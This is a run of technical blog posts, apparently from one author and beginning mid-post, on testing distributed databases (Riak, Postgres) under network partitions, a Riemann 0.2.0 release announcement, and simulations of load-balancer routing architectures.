If your Riak cluster partitions, and you write to a node which can’t reach any of the original copies of the data, that write of a fresh object can overwrite the original record–destroying all the original data.

Strict quorum

The problem is that we allowed writes to proceed on both sides of the partition. Riak has two more settings for reads and writes: PR and PW, for primary read and write, respectively. PR means you have to read a value from at least that many of the original owners of a key: fallback vnodes don’t count. If we set PR + PW >= quorum, operations against a given key will only be able to proceed on one component of a partitioned cluster. That’s a CP system, right?

lein run lock riak-lww-quorum274 :ok 1250 :ok 279 com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pw_val_unsatisfied,2,1} 1381 :ok 277 com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pr_val_unsatisfied,2,1}

Here we see the cluster denying a write and a read, respectively, to clients which can’t see a majority of the primary nodes for a key. Note that because the quorums are spread around the nodes, a Dynamo system will be partially available in this mode. In any given component, you’ll be able to read and write some fraction of the keys, but not others.

2000 total 1971 acknowledged 170 survivors 1807 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 86 91 95 96 100 101 ... 1994 1995 1996 1997 1998 1999 6 unacknowledged writes found! ヽ(´ー`)ノ (193 208 219 237 249 252) 0.9855 ack rate 0.9167935 loss rate 0.00304414 unacknowledged but successful rate
You must not know CP / You must not know CP

PR=PW=R=W=quorum still allowed 92% write loss. We reported failure for more writes than before, so that’s a start–but what gives? Shouldn’t this have been CP?

The problem is that that failed writes may still be partially successful. Dynamo is designed to preserve writes as much as possible. Even though a node might return “PW val unsatisfied” when it can’t replicate to the primary vnodes for a key, it may have been able to write to one primary vnode–or any number of fallback vnodes. Those values will still be exchanged during read-repair, considered as conflicts, and the timestamp used to discard the older value–meaning all writes from one side of the cluster.

This means the minority component’s failing writes can destroy all of the majority component’s successful writes. Repeat after me: Clocks. Are. Evil.

Embrace your siblings

I can't help feeling we could have had it all

Is there no hope? Is there anything we can do to preserve my writes in Riak?

Yes. We can use CRDTs.

If we enable allow-mult in Riak, the vector clock algorithms will present both versions to the client. We can combine those objects together using a merge function. If the merge function is associative, commutative, and idempotent over that type of object, we can guarantee that it always converges to the same value regardless of the order of writes. If the merge function doesn’t discard data (like last-write-wins does), then it will preserve writes from both sides.

In this case, we’re accumulating a set of numbers. We can use set union as our merge function, or 2P sets, or OR sets, if we need to remove numbers.

lein run riak-crdtWrites completed in 80.918 seconds 2000 total 1948 acknowledged 2000 survivors All 2000 writes succeeded. :-D

CRDTs preserve 100% of our writes. We still have false negatives in this demo, because the client timed out on a few writes which Riak was still propagating, when the partition first began. False negatives are OK, though, because state-based CRDTs are idempotent. We can repeat our writes arbitrarily many times, in any order, without duplicating data.

Moreover, CRDTs are an AP design: we can write safely and consistently even when the cluster is totally partitioned–for example, when no majority exists. They’re also eventually consistent (in a safe, data-preserving sense) when components are partitioned away from all copies of a given object and are forced to start from scratch.

All of the writes (na na na na NAA NA na na na na NAA NA)

Strategies for working with Riak

Sean Cribbs is the DARE Lion.

Enable allow-mult. Use CRDTs.

Seriously. LWW never should have been the standard behavior for a Dynamo system, but Basho made it the default after customers complained that they didn’t like the complexity of reasoning about siblings. Customers are the only reason Riak exists, and this behavior is gonna seem OK until you start experiencing partitions (and remember, fault tolerance is the reason you chose Riak in the first place), so we’re stuck with a default config which promotes simple-yet-dangerous behavior.

As a consequence of that decision, community resources which people rely on to learn how to use Riak are often aimed towards last-write-wins. Software isn’t just an artifact, but a culture around its use. I don’t really know what we can learn from this, besides the fact that engineering and culture are tough problems.

CRDTs may be too large, too complex, or too difficult to garbage-collect for your use case. However, even if you can’t structure your data as a full CRDT, writing a hacked-together merge function which just takes care of a couple important fields (say, set union over your friend list and logical OR over the other fields) can go a long way towards preventing catastrophic data loss.

There are cases where last-write-wins is a safe strategy. If your data is immutable, then it doesn’t matter which copy you choose. If your writes mean “I know the full correct state of this object at this time”, it’s safe. Many caches and backup systems look like this. If, however, your writes mean “I am changing something I read earlier,” then LWW is unsafe.

Finally, you can decide to accept dropped data. All databases will fail, in different ways, and with varying probabilities. Riak’s probability distribution might be OK for you.

Introducing locks is a bad idea. Even if they did prevent data loss–and as we saw, they don’t–you’ll impose a big latency cost. Moreover, locks restrict your system to being CP, so there’s little advantage to having an AP database. However, some really smart folks at Basho are working on adding Paxos rounds for writes which need to be CP. Having a real consensus protocol will allow Riak’s distributed writes to be truly atomic.

So: we’ve seen that Riak’s last-write-wins is fundamentally unsafe in the presence of network partitions. You can lose not only writes made during the partition, but all writes made at any time prior. Riak is an AP system, and its tunable CAP controls only allow you to detect some forms of write loss–not prevent it. You can’t add consistency to a database by tacking on a lock service because wall clock time doesn’t matter: consistency is a causal property of the relationships between the writes themselves. AP systems involve fundamentally different kinds of data structures, with their own unique tradeoffs.

In the next post, we’ll review what we’ve learned from these four distributed systems, and where we go from here.

Previously on Jepsen, we introduced the problem of network partitions. Here, we demonstrate that a few transactions which “fail” during the start of a partition may have actually succeeded.

Postgresql is a terrific open-source relational database. It offers a variety of consistency guarantees, from read uncommitted to serializable. Because Postgres only accepts writes on a single primary node, we think of it as a CP system in the sense of the CAP theorem. If a partition occurs and you can’t talk to the server, the system is unavailable. Because transactions are ACID, we’re always consistent.

Right?

Well… almost. Even though the Postgres server is always consistent, the distributed system composed of the server and client together may not be consistent. It’s possible for the client and server to disagree about whether or not a transaction took place.

-017.jpg
-018.jpg

Postgres' commit protocol, like most relational databases, is a special case of two-phase commit, or 2PC. In the first phase, the client votes to commit (or abort) the current transaction, and sends that message to the server. The server checks to see whether its consistency constraints allow the transaction to proceed, and if so, it votes to commit. It writes the transaction to storage and informs the client that the commit has taken place (or failed, as the case may be.) Now both the client and server agree on the outcome of the transaction.

What happens if the message acknowledging the commit is dropped before the client receives it? Then the client doesn’t know whether the commit succeeded or not! The 2PC protocol says that we must wait for the acknowledgement message to arrive in order to decide the outcome. If it doesn’t arrive, 2PC deadlocks. It’s not a partition-tolerant protocol. Waiting forever isn’t realistic for real systems, so at some point the client will time out and declare an error occurred. The commit protocol is now in an indeterminate state.

To demonstrate this, we’ll need an install of Postgres to work with.

salticid postgres.setup

This installs Postgres from apt, uploads some config files from jepsen/salticid/postgres, and creates a database for Jepsen. Then we’ll run a simple application which writes a single row for each number, inside a transaction.

cd salticid lein run pg -n 100

If all goes well, you’ll see something like

... 85 :ok 91 :ok 90 :ok 95 :ok 96 :ok Hit enter when ready to collect results. Writes completed in 0.317 seconds 100 total 100 acknowledged 100 survivors All 100 writes succeeded. :-D
-020.jpg

Each line shows the number being written, followed by whether it was OK or not. In this example, all five nodes talk to a single postgres server on n1. Out of 100 writes, the clients reported that all 100 succeeded–and at the end of the test, all 100 numbers were present in the result set.

Now let’s cause a partition. Since this failure mode only arises when the connection drops after the server decides to acknowledge, but before the client receives it, there’s only a short window in which to begin the partition. We can widen that window by slowing down the network:

salticid jepsen.slow

Now, we start the test:

lein run pg

And while it’s running, cut off all postgres traffic to and from n1:

salticid jepsen.drop_pg

If we’re lucky, we’ll manage to catch one of those acknowledgement packets in flight, and the client will log an error like:

217 An I/O error occurred while sending to the backend. Failure to execute query with SQL: INSERT INTO "set_app" ("element") VALUES (?) :: [219] PSQLException: Message: An I/O error occured while sending to the backend. SQLState: 08006 Error Code: 0 218 An I/O error occured while sending to the backend.

After that, new transactions will just time out; the client will correctly log these as failures:

220 Connection attempt timed out. 222 Connection attempt timed out.

We can resolve the partition with salticid jepsen.heal, and wait for the test to complete.

1000 total 950 acknowledged 952 survivors 2 unacknowledged writes found! ヽ(´ー`)ノ (215 218) 0.95 ack rate 0.0 loss rate 0.002105263 unacknowledged but successful rate
-019.jpg

So out of 1000 attempted writes, 950 were successfully acknowledged, and all 950 of those writes were present in the result set. However, two writes (215 and 218) succeeded, even though they threw an exception claiming that a failure occurred! Note that this exception doesn’t guarantee that the write succeeded or failed: 217 also threw an I/O error while sending, but because the connection dropped before the client’s commit message arrived at the server, the transaction never took place.

There is no way to distinguish these cases from the client. A network partition–and indeed, most network errors–doesn’t mean a failure. It means the absence of information. Without a partition-tolerant commit protocol, like extended three-phase commit, we cannot assert the state of the system for these writes.

2PC strategies

Two-phase commit protocols aren’t just for relational databases. They crop up in all sorts of consensus problems. Mongodb’s documents essentially comprise an asynchronous network, and many users implement 2PC on top of their Mongo objects to obtain multi-key transactions.

If you’re working with two-phase commit, there are a few things you can do. One is to accept false negatives. In most relational databases, the probability of this failure occurring is low–and it can only affect writes which were in-flight at the time the partition began. It may be perfectly acceptable to return failures to clients even if there’s a small chance the transaction succeeded.

Alternatively, you can use consistency guarantees or other data structures to allow for idempotent operations. When you encounter a network error, just retry them blindly. A highly available queue with at-least-once delivery is a great place to put repeatable writes which need to be retried later.

Finally, within some databases you can obtain strong consistency by taking note of the current transaction ID, and writing that ID to the database during the transaction. When the partition is resolved, the client can either retry or cancel the transaction at a later time, by checking whether or not that transaction ID was written. Again, this relies on having some sort of storage suitable for the timescales of the partition: perhaps a local log on disk, or an at-least-once queue.

In the next post, we look at a very different kind of consistency model: Redis Sentinel.

This article is part of Jepsen, a series on network partitions. We're going to learn about distributed consensus, discuss the CAP theorem's implications, and demonstrate how different databases behave under partition.

Carly Rae Jepsen may be singing about the cute guy next door, but she's also telling a story about the struggle to communicate with someone who doesn't even know you're alive. The suspense of observation: did he see me? Did he see me see him? The risks of speaking your mind and being shot down–or worse, ignored. The fundamental unknowability of The Other, as Lacan would have it. In short, this is a song about distributed systems.

-004.jpg

Modern software systems are composed of dozens of components which communicate over an asynchronous, unreliable network. Understanding the reliability of a distributed system's dynamics requires careful analysis of the network itself. Like most hard problems in computer science, this one comes down to shared state. A set of nodes separated by the network must exchange information: “Did I like that post?” “Was my write successful?” “Will you thumbnail my image?” “How much is in my account?”

At the end of one of these requests, you might guarantee that the requested operation…

  • will be visible to everyone from now on
  • will be visible to your connection now, and others later
  • may not yet be visible, but is causally connected to some future state of the system
  • is visible now, but might not be later
  • may or may not be visible: ERRNO_YOLO

These are some examples of the complex interplay between consistency and durability in distributed systems. For instance, if you're writing CRDTs to one of two geographically replicated Riak clusters with W=2 and DW=1, you can guarantee that write…

  • is causally connected to some future state of the system
  • will survive the total failure of one node
  • will survive a power failure (assuming fsync works) of all nodes
  • will survive the destruction of an entire datacenter, given a few minutes to replicate

If you're writing to ZooKeeper, you might have a stronger set of guarantees: the write is visible now to all participants, for instance, and that the write will survive the total failure of up to n/2 - 1 nodes. If you write to Postgres, depending on your transaction's consistency level, you might be able to guarantee that the write will be visible to everyone, just to yourself, or “eventually”.

These guarantees are particularly tricky to understand when the network is unreliable.

Partitions

Formal proofs of distributed systems often assume that the network is asynchronous, which means the network may arbitrarily duplicate, drop, delay, or reorder messages between nodes. This is a weak hypothesis: some physical networks can do better than this, but in practice IP networks will encounter all of these failure modes, so the theoretical limitations of the asynchronous network apply to real-world systems as well.

-006.jpg

In practice, the TCP state machine allows nodes to reconstruct “reliable” ordered delivery of messages between nodes. TCP sockets guarantee that our messages will arrive without drops, duplication, or reordering. However, there can still be arbitrary delays–which would ordinarily cause the distributed system to lock indefinitely. Since computers have finite memory and latency bounds, we introduce timeouts, which close the connection when expected messages fail to arrive within a given time frame. Calls to read() on sockets will simply block, then fail.

-008.jpg

Detecting network failures is hard. Since our only knowledge of the other nodes passes through the network, delays are indistinguishible from failure. This is the fundamental problem of the network partition: latency high enough to be considered a failure. When partitions arise, we have no way to determine what happened on the other nodes: are they alive? Dead? Did they receive our message? Did they try to respond? Literally no one knows. When the network finally heals, we'll have to re-establish the connection and try to work out what happened–perhaps recovering from an inconsistent state.

Many systems handle partitions by entering a special degraded mode of operation. The CAP theorem tells us that we can either have consistency (technically, linearizability for a read-write register), or availability (all nodes can continue to handle requests), but not both. What's more, few databases come close to CAP's theoretical limitations; many simply drop data.

In this series, I'm going to demonstrate how some real distributed systems behave when the network fails. We'll start by setting up a cluster and a simple application. In each subsequent post, we'll explore that application written for a particular database, and how that system behaves under partition.

Setting up a cluster

-011.jpg

You can create partitions at home! For these demonstrations, I'm going to be running a five node cluster of Ubuntu 12.10 machines, virtualized using LXC–but you can use real computers, virtual private servers, EC2, etc. I've named the nodes n1, n2, n3, n4, and n5: it's probably easiest to add these entries to /etc/hosts on your computer and on each of the nodes themselves.

We're going to need some configuration for the cluster, and client applications to test their behavior. You can clone http://github.com/aphyr/jepsen to follow along.

To run commands across the cluster, I'm using Salticid (http://github.com/aphyr/salticid). I've set my ~/.salticidrc to point to configuration in the Jepsen repo:

load ENV['HOME'] + '/jepsen/salticid/*.rb'

If you take a look at this file, you'll see that it defines a group called :jepsen, with hosts n1 … n5. The user and password for each node is 'ubuntu'–you'll probably want to change this if you're running your nodes on the public internet.

Try salticid -s salticid to see all the groups, hosts, and roles defined by the current configuration:

$ salticid -s salticid Groups jepsen Hosts: n1 n2 n3 n4 n5 Roles base riak mongo redis postgres jepsen net Top-level tasks

First off, let's set up these nodes with some common software–compilers, network tools, etc.

salticid base.setup

The base role defines some basic operating system functions. base.reboot will reboot the cluster, and base.shutdown will unpower it.

The jepsen role defines tasks for simulating network failures. To cause a partition, run salticid jepsen.partition. That command causes nodes n1 and n2 to drop IP traffic from n3, n4, and n5–essentially by running

iptables -A INPUT -s n3 -j DROP iptables -A INPUT -s n4 -j DROP iptables -A INPUT -s n5 -j DROP

That's it, really. To check the current network status, run jepsen.status. jepsen.heal will reset the iptables chains to their defaults, resolving the partition.

To simulate slow networks, or networks which drop packets, we can use tc to adjust the ethernet interface. Jepsen assumes the inter-node interface is eth0. salticid jepsen.slow will add latency to the network, making it easier to reproduce bugs which rely on a particular message being dropped. salticid jepsen.flaky will probabilistically drop messages. Adjusting the inter-node latency and lossiness simulates the behavior of real-world networks under congestion, and helps expose timing dependencies in distributed algorithms–like database replication.

A simple distributed system

-010.jpg

In order to test a distributed system, we need a workload–a set of clients which make requests and record their results for analysis. For these posts, we're going to work with a simple application which writes several numbers to a list in a database. Each client app will independently write some integers to the DB. With five clients, client 0 writes 0, 5, 10, 15, …; client 1 writes 1, 6, 11, and so on.

For each write we record whether the database acknowledged the write successfully or whether there was an error. At the end of the run, we ask the database for the full set. If acknowledged writes are missing, or unacknowledged writes are present, we know that the system was inconsistent in some way: that the client application and the database disagreed about the state of the system.

In this series of blog posts, we're going to run this app against several distributed databases, and cause partitions during its run. In each case, we'll see how the system responds to the uncertainty of dropped messages. As the song might go:

-012.jpg
-013.jpg

I've written several implementations of this workload in Clojure. jepsen/src/jepsen/set_app.clj defines the application. (defprotocol SetApp ...) lists the functions an app has to implement, and (run n apps) sets up the apps and runs them in parallel, collects results, and shows any inconsistencies. Particular implementations live in src/jepsen/riak.clj, pg.clj,redis.clj, and so forth.

You'll need a JVM and Leiningen 2 to run this code. Once you've installed lein, and added it to your path, we're ready to go!

Next up on Jepsen, we take a look at how Postgresql's transaction protocol handles network failures.

Riemann 0.2.0 is ready. There's so much left that I want to build, but this release includes a ton of changes that should improve usability for everyone, and I'm excited to announce its release.

Version 0.2.0 is a fairly major improvement in Riemann's performance and capabilities. Many things have been solidified, expanded, or tuned, and there are a few completely new ideas as well. There are a few minor API changes, mostly to internal structure–but a few streams are involved as well. Most functions will continue to work normally, but log a deprecation notice when used.

I dedicated the past six months to working on Riemann full-time. I was fortunate to receive individual donations as well as formal contracts with Blue Mountain Capital, SevenScale, and Iovation during that time. That money gave me months of runway to help make these improvements–but even more valuable was the feedback I received from production users, big and small. I've used your complaints, frustrations, and ideas to plan Riemann's roadmap, and I hope this release reflects that.

This release includes contributions from a broad cohort of open-source developers, and I want to recognize everyone who volunteered their time and energy to make Riemann better. In particular, I'd like to call out Pierre-Yves Ritschard, lwf, Ben Black, Thomas Omans, Dave Cottlehuber, and, well, the list goes on and on. You rock.

These months have seen not only improvements to Riemann itself, but to the dashboard, clients, and integration packages. While I'm spending most of my time working on the core Riemann server, it's really this peripheral software that make Riemann useful for instrumenting production systems. There's no way I could hope to understand, let alone write and test the code to integrate with all these technologies–which makes your work particularly valuable.

This week I started my new job at Factual. I won't be able to work 10 hours each day on Riemann any more, but I'm really happy with what we've built together, and I'll definitely keep working on the next release.

To all Riemann's users and contributors, thank you. Here's to 0.2.0.

New features

  • Arbitrary key-value (string) pairs on events
  • Hot config reloading
  • Integrated nrepl server
  • streams/sdo: bind together multiple streams as one
  • streams/split: like (cond), dispatch an event to the first matching stream
  • streams/splitp: like split, but on the basis of a specific predicate
  • config/delete-from-index: explicitly remove (similar) events from the index
  • streams/top: streaming top-k
  • streams/tag: add tags to events
  • RPM packaging
  • Init scripts, proper log dirs, and users for debian and RPM packages. Yeah, this means you can /etc/init.d/riemann reload, and Stuff Just Works ™.
  • folds/difference, product, and quotient.
  • Folds come in sloppy and strict variants which should “Do What I Mean” in most contexts.
  • Executor Services for asynchronous queued processing of events.
  • streams/exception-stream: captures exceptions and converts them to events.

Improvements

  • http://riemann.io site
  • Lots more documentation and examples
  • Config file syntax errors are detected early
  • Cleaned up server logging
  • Helpful messages (line numbers! filenames!) for configuration errors
  • Silence closed channel exceptions
  • Cores can preserve services like pubsub, the index, etc through reloads
  • Massive speedups in TCP and UDP server throughput
  • streams/rate works in real-time: no need for fill-in any more
  • Graphite client is faster, more complete
  • Config files can include other files by relative path
  • streams/coalesce passes on expired events
  • riemann.email/mailer can take custom :subject and :body functions
  • riemann.config includes some common time/scheduling functions
  • streams/where returns whether it matched an event, which means (where) is now re-usable as a predicate in lots of different contexts.
  • streams/tagged-any and tagged-all return whether they matched
  • streams/counter is resettable to a particular metric, and supports expiry
  • Bring back “hyperspace core online”
  • Update to netty 3.6.1
  • Reduced the number of threadpools used by the servers
  • Massive speedup in Netty performance by re-organizing execution handlers
  • core/reaper takes a :keep-keys option to specify which fields on an event are preserved
  • streams/smap ignores nil values for better use with folds
  • Update to aleph 0.3.0-beta15
  • Config files ship with emacs modelines, too

Bugfixes

  • Fixed a bug in part-time-fast causing undercounting under high contention
  • Catch exceptions while processing expired events
  • Fix a bug escaping metric names for librato
  • riemann.email/mailer can talk to SMTP relays again
  • graphite-path-percentiles will convert decimals of three or more places to percentile strings
  • streams/rollup is much more efficient; doesn't leak tasks
  • streams/rollup aggregates and forwards expired events instead of stopping
  • Fixed a threadpool leak from Netty
  • streams/coalesce: fixed a bug involving lazy persistence of transients
  • streams/ddt: fixed a few edge cases

Internals

  • Cleaned up the test suite's logging
  • Pluggable transports for netty servers
  • Cores are immutable
  • Service protocol: provides lifecycle management for internal components
  • Tests for riemann.config
  • riemann.periodic is gone; replaced by riemann.time
  • Tried to clean up some duplicated functions between core, config, and streams
  • riemann.common/deprecated
  • Cleaned up riemann.streams, removing unused commented-out code
  • Lots of anonymous functions have names now, to help with profiling
  • Composing netty pipeline factories is much simpler
  • Clojure 1.5

Known bugs

  • Passing :host to websocket-server does nothing: it binds to * regardless.
  • Folds/mean throws when it receives empty lists
  • graphite-server has no tests
  • Riemann will happily overload browsers via websockets
  • streams/rate doesn't stop its internal poller correctly when self-expiring
  • When Netty runs out of filehandles, it'll hang new connections

The Netty redesign of riemann-java-client made it possible to expose an end-to-end asynchronous API for writes, which has a dramatic improvement on messages with a small number of events. By introducing a small queue of pipelined write promises, riemann-clojure-client can now push 65K events per second, as individual messages, over a single TCP socket. Works out to about 120 mbps of sustained traffic.

single-events.png

I'm really happy about the bulk throughput too: three threads using a single socket, sending messages of 100 events each, can push around 185-200K events/sec, at over 200 mbps. That throughput took 10 sockets and hundreds of threads to achieve in earlier tests.

bulk.png

This isn't a particularly useful feature as far as clients go; it's unlikely most users will want to push this much from a single client. It is critical, however, for optimizing Riemann's server performance. The server, running the bulk test, consumes about 115% CPU on my 2.5Ghz Q8300. I believe this puts a million events/sec within reach for production hardware, though at that throughput CAS contention in the streams may become a limiting factor. If I can find a box (and network) powerful enough to test, I'd love to give it a shot!

This is the last major improvement for Riemann 0.2.0. I'll be focusing on packaging and documentation tomorrow. :)

In the previous post, I described an approximation of Heroku's Bamboo routing stack, based on their blog posts. Hacker News, as usual, is outraged that the difficulty of building fast, reliable distributed systems could prevent Heroku from building a magically optimal architecture. Coda Hale quips:

Really enjoying @RapGenius’s latest mix tape, “I Have No Idea How Distributed Systems Work”.

Coda understands the implications of the CAP theorem. This job is too big for one computer–any routing system we design must be distributed. Distribution increases the probability of a failure, both in nodes and in the network itself. These failures are usually partial, and often take the form of degradation rather than the system failing as a whole. Two nodes may be unable to communicate with each other, though a client can see both. Nodes can lie to each other. Time can flow backwards.

CAP tells us that under these constraints, we can pick two of three properties (and I'm going to butcher them in an attempt to be concise):

  1. Consistency: nodes agree on the system's state.
  2. Availability: the system accepts requests.
  3. Partition tolerance: the system runs even when the network delays or drops some messages.

In the real world, partitions are common, and failing to operate during a partition is essentially a failure of availability. We must choose CP or AP, or some probabilistic blend of the two.

There's a different way to talk about the properties of a distributed system–and I think Peter Bailis explains it well. Liveness means that at every point, there exists a sequence of operations that allows the “right thing” to happen–e.g. “threads are never deadlocked” or “you never get stuck in an infinite loop”. Safety means the system fails to do anything bad. Together, safety and liveness ensure the system does good things on time.

With this in mind, what kind of constraints apply to HTTP request routing?

  1. The system must be partition tolerant.
  2. The system must be available–as much as possible, anyway. Serving web pages slower is preferable to not serving them at all. In the language of CAP, our system must be AP.
  3. But we can't wait too long, because requests which take more than a minute to complete are essentially useless. We have a liveness constraint.
  4. Requests must complete correctly, or not at all. We can't route an HTTP POST to multiple servers at once, or drop pieces of requests on the floor. We have a safety constraint.

It's impossible to do this perfectly. If all of our data centers are nuked, there's no way we can remain available. If the network lies to us, it can be impractical to guarantee correct responses. And we can let latencies rise to accommodate failure: the liveness constraint is flexible.

Finally, we're real engineers. We're going to make mistakes. We have limited time and money, limited ability to think, and must work with existing systems which were never designed for the task at hand. Complex algorithms are extraordinarily difficult to prove–let alone predict–at scale, or under the weird failure modes of distributed systems. This means it's often better to choose a dumb but predictable algorithm over an optimal but complex one.

What I want to make clear is that Heroku is full of smart engineers–and if they're anything like the engineers I know, they're trying their hardest to adapt to a rapidly changing problem, fighting fires and designing new systems at the same time. Their problems don't look anything like yours or mine. Their engineering decisions are driven by complex and shifting internal constraints which we can't really analyze or predict. When I talk about “improved routing models” or “possible alternatives”, please understand that those models may be too complex, incompatible, or unpredictable to build in a given environment.

Dealing with unreliability

Returning to our Bamboo stack simulation, I'd like to start by introducing failure dynamics.

Real nodes fail. We'll make our dynos unreliable with the faulty function, which simulates a component which stays online for an exponentially-distributed time before crashing, then returns error responses instead of allowing requests to pass through. After another exponentially-distributed outage time, it recovers, and the process continues. You can interpret this as a physical piece of hardware, or a virtual machine, or a hot-spare scenario where another node spins up to take the downed one's place, etc. This is a fail-fast model–the node returns failure immediately instead of swallowing messages indefinitely. Since the simulations we're running are short-lived, I'm going to choose relatively short failure times so we can see what happens under changing dynamics.

(defn faulty-dyno [] (cable 2 ; Mean time before failure of 20 seconds, and ; mean time before resolution of one second. (faulty 20000 1000 (queue-exclusive (delay-fixed 20 (delay-exponential 100 (server :rails))))))

Again, we're using a pool of 250 dynos and a poisson-distributed load function. Let's compare an even load balancer with a pool of perfect dynos vs a pool of faulty ones:

(test-node "Reliable min-conn -> pool of faulty dynos." (lb-min-conn (pool pool-size (faulty-dyno))))). Ideal dynos 95% available dynos Total reqs: 100000 100000 Selected reqs: 50000 50000 Successful frac: 1.0 0.62632 Request rate: 678.2972 reqs/s 679.6156 reqs/s Response rate: 673.90894 reqs/s 676.74567 reqs/s Latency distribution: Min: 24.0 4.0 Median: 93.0 46.5 95th %: 323.0 272.0 99th %: 488.0 438.0 Max: 1044.0 914.0

Well that was unexpected. Even though our pool is 95% available, over a third of all requests fail. Because our faulty nodes fail immediately, they have smaller queues on average–and the min-conns load balancer routes more requests to them. Real load balancers like HAProxy keep track of which nodes fail and avoid routing requests to them. Haproxy uses active health checks, but for simplicity I'll introduce a passive scheme: when a request fails, don't decrement that host's connection counter immediately. Instead, wait for a while–say 1 second, the mean time to resolution for a given dyno. We can still return the error response immediately, so this doesn't stop the load balancer from failing fast, but it will reduce the probability of assigning requests to broken nodes.

(lb-min-conn :lb {:error-hold-time 1000} (pool pool-size (faulty-dyno)))))Total reqs: 100000 Selected reqs: 50000 Successful frac: 0.98846 Request rate: 678.72076 reqs/s Response rate: 671.3302 reqs/s Latency distribution: Min: 4.0 Median: 92.0 95th %: 323.0 99th %: 486.0 Max: 1157.0

Throughput is slightly lower than the ideal, perfect pool of dynos, but we've achieved 98% reliability over a pool of nodes which is only 95% available, and done it without any significant impact on latencies. This system is more than the sum of its parts.

This system has an upper bound on its reliability: some requests must fail in order to determine which dynos are available. Can we do better? Let's wrap the load balancer with a system that retries requests on error, up to three requests total:

(test-node "Retry -> min-conn -> faulty pool" (retry 3 (lb-min-conn :lb {:error-hold-time 1000} (pool pool-size (faulty-dyno))))))Total reqs: 100000 Selected reqs: 50000 Successful frac: 0.99996 Request rate: 676.8098 reqs/s Response rate: 670.16046 reqs/s Latency distribution: Min: 12.0 Median: 94.0 95th %: 320.0 99th %: 484.0 Max: 944.0

The combination of retries, least-conns balancing, and diverting requests away from failing nodes allows us to achieve 99.996% availability with minimal latency impact. This is a great building block to work with. Now let's find a way to compose it into a large-scale distributed system.

Multilayer routing

Minimum-connections and round-robin load balancers require coordinated state. If the machines which comprise our load balancer are faulty, we might try to distribute the load balancer itself in a highly available fashion. That would require state coordination with low latency bounds–and the CAP theorem tells us this is impossible to do. We'd need to make probabilistic tradeoffs under partitions, like allowing multiple requests to flow to the same backend.

What if we punt on AP min-conns load balancers? What if we make them single machines, or CP clusters? As soon as the load balancer encountered a problem, it would become completely unavailable.

(defn faulty-lb [pool] (faulty 20000 1000 (retry 3 (lb-min-conn :lb {:error-hold-time 1000} pool))))

Let's model the Bamboo architecture again: a stateless, random routing layer on top, which allocates requests to a pool of 10 faulty min-conns load balancers, all of which route over a single pool of faulty dynos:

(test-node "Random -> 10 faulty lbs -> One pool" (let [dynos (dynos pool-size)] (lb-random (pool 10 (cable 5 (faulty-lb dynos)))))))Total reqs: 100000 Selected reqs: 50000 Successful frac: 0.9473 Request rate: 671.94366 reqs/s Response rate: 657.87744 reqs/s Latency distribution: Min: 10.0 Median: 947.0 95th %: 1620.0 99th %: 1916.0 Max: 3056.0

Notice that our availability dropped to 95% in the two-layer distributed model. This is a consequence of state isolation: because the individual least-conns routers don't share any state, they can't communicate about which nodes are down. That increases the probability that we'll allocate requests to broken dynos. A load-balancer which performed active state-checks wouldn't have this problem; but we can work around it by adding a second layer of retries on top of the stateless random routing layer:

(let [dynos (pool pool-size (faulty-dyno))] (retry 3 (lb-random (pool 10 (cable 5 (faulty-lb dynos))))))))Total reqs: 100000 Selected reqs: 50000 Successful frac: 0.99952 Request rate: 686.97363 reqs/s Response rate: 668.2616 reqs/s Latency distribution: Min: 30.0 Median: 982.0 95th %: 1639.0 99th %: 1952.010000000002 Max: 2878.0

This doesn't help our latency problem, but it does provide three nines availability! Not bad for a stateless routing layer on top of a 95% available pool. However, we can do better.

homogenous.jpg

Isolating the least-conns routers from each other is essential to preserve liveness and availability. On the other hand, it means that they can't share state about how to efficiently allocate requests over the same dynos–so they'll encounter more failures, and queue multiple requests on the same dyno independently. One way to resolve this problem is to ensure that each least-conns router has a complete picture of its backends' state. We isolate the dynos from one another:

distinct.jpg

This has real tradeoffs! For one, an imbalance in the random routing topology means that some min-conns routers will have more load than their neighbors–and they can't re-route requests to dynos outside their pool. And since our min-conns routers are CP systems in this architecture, when they fail, an entire block of dynos is unroutable. We have to strike a balance between more dynos per block (efficient least-conns routing) and more min-conn blocks (reduced impact of a router failure).

Let's try 10 blocks of 25 dynos each:

(test-node "Retry -> Random -> 10 faulty lbs -> 10 pools" (retry 3 (lb-random (pool 10 (cable 5 (faulty-lb (pool (/ pool-size 10) (faulty-dyno)))))))))Total reqs: 100000 Selected reqs: 50000 Successful frac: 0.99952 Request rate: 681.8213 reqs/s Response rate: 677.8099 reqs/s Latency distribution: Min: 30.0 Median: 104.0 95th %: 335.0 99th %: 491.0 Max: 1043.0

Whoah! We're still 99.9% available, even with a stateless random routing layer on top of 10 95% available routers. Throughput is slightly down, but our median latency is nine times lower than the homogenous dyno pool.

single-distinct.png

I think system composition is important in distributed design. Every one of these components is complex. It helps to approach each task as an isolated system, and enforce easy-to-understand guarantees about that component's behavior. Then you can compose different systems together to make something bigger and more useful. In these articles, we composed an efficient (but nonscalable) CP system with an inefficient (but scalable) AP system to provide a hybrid of the two.

If you have awareness of your network topology and are designing for singlethreaded, queuing backends, this kind of routing system makes sense. However, it's only going to be efficient if you can situate your dynos close to their least-conns load balancer. One obvious design is to put one load balancer in each rack, and hook it directly to the rack's switch. If blocks are going to fail as a group, you want to keep those blocks within the smallest network area possible. If you're working in EC2, you may not have clear network boundaries to take advantage of, and correlated failures across blocks could be a real problem.

This architecture also doesn't make sense for concurrent servers–and that's a growing fraction of Heroku's hosted applications. I've also ignored the problem of dynamic pools, where dynos are spinning up and exiting pools constantly. Sadly I'm out of time to work on this project, but perhaps a reader will chime in a model for for distributed routing over concurrent servers–maybe with a nonlinear load model for server latencies?

Thanks for exploring networks with me!

For more on Timelike and routing simulation, check out part 2 of this article: everything fails all the time. There's also more discussion on Reddit.

RapGenius is upset about Heroku's routing infrastructure. RapGenius, like many web sites, uses Rails, and Rails is notoriously difficult to operate in a multithreaded environment. Heroku operates at large scale, and made engineering tradeoffs which gave rise to high latencies–latencies with adverse effects on customers. I'd like to explore why Heroku's Bamboo architecture behaves this way, and help readers reason about their own network infrastructure.

To start off with, here's a Rails server. Since we're going to be discussing complex chains of network software, I'll write it down as an s-expression:

(server :rails)

Let's pretend that server has some constant request-parsing overhead–perhaps 20 milliseconds–and an exponentially-distributed processing time with a mean of 100 milliseconds.

(delay-fixed 20 (delay-exponential 100 (server :rails)))

